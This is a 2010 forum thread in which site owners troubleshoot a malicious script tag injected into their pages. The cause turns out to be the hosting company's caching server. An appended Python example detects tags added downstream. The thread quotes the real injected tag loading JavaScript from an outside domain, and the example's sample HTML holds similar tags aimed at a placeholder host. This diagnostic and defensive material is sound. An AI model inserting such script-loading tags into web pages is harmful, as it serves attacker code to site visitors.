rrayfield
Starting Member
4 Posts |
Posted - 2010-09-17 : 13:00:20
|
OK, so my sites are down and this annoying script tag is posted at the top of pages with database connections, trying to load a JavaScript from jujud.9966.org. On other research I have realized that this problem is not just with one database instance on the server. It seems to have infected all of them (9). So the different sites I go to also have this same script that are using the same database instance.

I have dug through logs and searched the database for anything related to that script to remove it. There has been no data modified in the database on the tables I have created that I can tell. Where should I look to remove this thing? It's killing my clients. I have used this searching for the word script but it returns nothing. http://vyaskn.tripod.com/search_all_columns_in_all_tables.htm

Any help with this is highly appreciated!
Thanks
Ryan |
|
rrayfield
Starting Member
4 Posts |
Posted - 2010-09-17 : 13:19:13
|
This is the script it adds: <script language=javascript src=h ttp: // jujud. 9966.o rg/ index. htm></script>. AVG picks it right up, but I cannot tell what is adding it to the page. It's driving me nuts...

[EDIT by spirit1] added spaces in URL to make it unclickable |
|
|
Kristen
Test
22859 Posts |
Posted - 2010-09-17 : 13:25:53
|
Infection of one database may have been able to spring-board to infect the others, so it may have started in another database on that server. If you are not in control of all the databases (e.g. you are using shared hosting) then you may be the innocent victim - although if that's the case then the security on that server stinks.

If that's not the case then there is something in your application that has allowed un-sanitised data to be passed to SQL, and you need to fix that before you put the application back upright (otherwise the Injectors will be back again tomorrow ...)

If you can't find the data in the database it might not be there. Maybe they just hacked the web site and changed the HTML / web pages?

It might also be that the script command is not there verbatim - it might be obfuscated or PACKed or somesuch.

Perhaps restore from Backup (from shortly prior to the attack) to a Temporary database and use a tool like RedGate Compare to see what is different between the Temp database and your Live database. That will find all records legitimately changed, of course, but will show you anything illegitimately changed too - although it might be like looking for a needle in a haystack.

If <SCRIPT> stuff has been injected into fields you will have to restore from an earlier backup - the injection will have wrecked the data that was in those fields. If you are using Full Recovery Model you will be able to roll forwards to just before the attack occurred which, if it was spotted promptly, will mean you lose very little data. |
|
|
Kristen
Test
22859 Posts |
Posted - 2010-09-17 : 13:26:58
|
Can you edit that link so that no one can accidentally click on it please. Otherwise you are going to spoil someone else's day too ... |
|
|
rrayfield
Starting Member
4 Posts |
Posted - 2010-09-17 : 13:32:08
|
Kristen, thanks for the info. I have access to all the DBs. I only have a backup for one of the databases, and it gets overwritten every night, so last night the good copy was probably overwritten with the bad. The weird thing about it is that:
* All my sites are data-driven, and the link seems to come and go; it's there 50% of the time.
* There are no HTML files to edit.
* If a page makes any call to the DB it has the potential to get infected no matter what table it's looking at?

This system has been in place for 3 years and has never had an issue like this. I am going to try the compare program. Could this be hiding in some system part of the DB that then attaches itself to all SELECT statements? |
|
|
rrayfield
Starting Member
4 Posts |
Posted - 2010-09-17 : 13:40:24
|
Upon further review... I may be looking in the wrong place. I have noticed that I went to a page on the site that makes no database calls and the link is still added. This file does make XML calls, but the XML is easy to check and it was clean. This is an ASP.NET dynamic page; there is no hard-coded stuff in there, it is all built from code. It seems like IIS may be hijacked? |
|
|
razorsharp
Starting Member
2 Posts |
Posted - 2010-09-17 : 17:59:40
|
I am having the same problem. This is what I can tell you so far:
1. Static HTML pages will even have the injected script.
2. There is NOWHERE in my database that this script exists.
3. NO changes have been made to this server in several days but this problem started this morning.
4. It would appear that it is IIS or there might be a caching server between my server and the "outside world" that is affected.

I am in the process of talking to Microsoft to see what the problem is. I am hoping that it is not a zero day. |
|
|
razorsharp
Starting Member
2 Posts |
Posted - 2010-09-17 : 20:29:37
|
IT WASN'T MY SERVER!!!

After spending the ENTIRE DAY investigating this (including Microsoft helping out too) the problem was a caching server at the hosting company that was injecting the script tag into the response AFTER my server sent it.

This was proven by capturing the network packets leaving the server's network card and analyzing the log file with Wireshark. NOWHERE in the log was there evidence that the malicious script came from my server.

I need a drink (well, lots of them)! |
|
|
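The two checks this thread converges on, as an added example that is not code from the thread or from any poster: Kristen's point that the injected tag may not be present verbatim (so the search has to normalise encoding, case and padding first), and razorsharp's proof that the tag was added after the server sent the response (so compare what left the NIC with what the client received, and anything that appears only on the client side was inserted downstream). It assumes you already have both HTML bodies as text, e.g. one exported from the Wireshark capture and one saved from a browser; the two bodies below are constructed stand-ins, and injected.example is a placeholder host, not the domain from the thread.

```python
"""Added example: separate "the server emitted it" from "something in the
path added it" by comparing the HTML captured at the server NIC with the
HTML a client received, and flag <script> tags only the client saw.

The two bodies at the bottom are constructed stand-ins (not real captures),
and injected.example is a placeholder host, not the domain from the thread."""
import html
import re
from typing import List, Set
from urllib.parse import urlsplit

# Any opening <script ...> tag; closing </script> tags do not match because
# of the "/" after "<".
SCRIPT_TAG = re.compile(r"<script\b[^>]*>", re.IGNORECASE)
# src attribute inside one tag, quoted or bare (the injected tag was bare).
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def normalize(body: str) -> str:
    """Undo cheap obfuscation before matching: HTML entity encoding
    (&#60;script&#62;), mixed case, and whitespace padding inside tags."""
    text = html.unescape(body)
    text = re.sub(r"<\s+", "<", text)   # "< script" -> "<script"
    return re.sub(r"\s+", " ", text)    # collapse runs of whitespace


def external_scripts(body: str) -> List[str]:
    """src URLs of every <script> tag in body, in document order."""
    srcs = []
    for tag in SCRIPT_TAG.finditer(normalize(body)):
        m = SRC_ATTR.search(tag.group(0))
        if m:
            srcs.append(m.group(1))
    return srcs


def injected_scripts(origin_body: str, observed_body: str) -> List[str]:
    """Script sources present in what the client received but absent from
    what the origin server sent. A non-empty result means the tag was added
    downstream of the server (proxy, cache, load balancer), not by the app."""
    origin = set(external_scripts(origin_body))
    return [s for s in external_scripts(observed_body) if s not in origin]


def offsite_scripts(body: str, trusted_hosts: Set[str]) -> List[str]:
    """Scripts loaded from a host outside trusted_hosts, for the case where
    no clean origin copy exists (e.g. the backup was already overwritten).
    Relative URLs have no host and are treated as same-site."""
    flagged = []
    for src in external_scripts(body):
        host = urlsplit(src).hostname
        if host and host.lower() not in trusted_hosts:
            flagged.append(src)
    return flagged


# Constructed sample: what left the NIC ...
ORIGIN_HTML = """<html><head><title>Orders</title>
<script src="/js/site.js"></script></head>
<body><p>Welcome back.</p></body></html>"""

# ... and what the browser got: one tag prepended before <html>, in the
# bare-attribute style from the thread, plus an entity-encoded one as it
# might sit in a log line or a database column.
OBSERVED_HTML = """<SCRIPT language=javascript SRC=http://injected.example/index.htm></SCRIPT>
<html><head><title>Orders</title>
<script src="/js/site.js"></script></head>
<body><p>Welcome back.</p>
&#60;script src=&quot;http://injected.example/second.js&quot;&#62;&#60;/script&#62;
</body></html>"""

if __name__ == "__main__":
    for src in injected_scripts(ORIGIN_HTML, OBSERVED_HTML):
        print("added after the server sent it:", src)
    for src in offsite_scripts(OBSERVED_HTML, {"www.example.com"}):
        print("loaded from an untrusted host:", src)
```

If `injected_scripts` returns anything, the fix is in the hosting chain, not in the application or the database; if the origin copy is clean but `offsite_scripts` still flags a tag in the body the server itself emitted, the problem is upstream of IIS in your own code or data, and the search of the database has to be repeated on normalised text rather than on the literal string "script".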